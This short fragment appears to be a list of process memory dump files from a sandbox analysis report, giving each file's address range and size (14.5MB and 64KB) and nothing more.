memory/4716-369-0x0000000000400000-0x000000000128A000-memory.dmpFilesize
14.5MB
-
memory/4820-459-0x00000000032C0000-0x00000000032D0000-memory.dmpFilesize
64KB
-
memory/4820-460-0x00000000032C0000-0x00000000032D0000-memory.dmpFilesize
64KB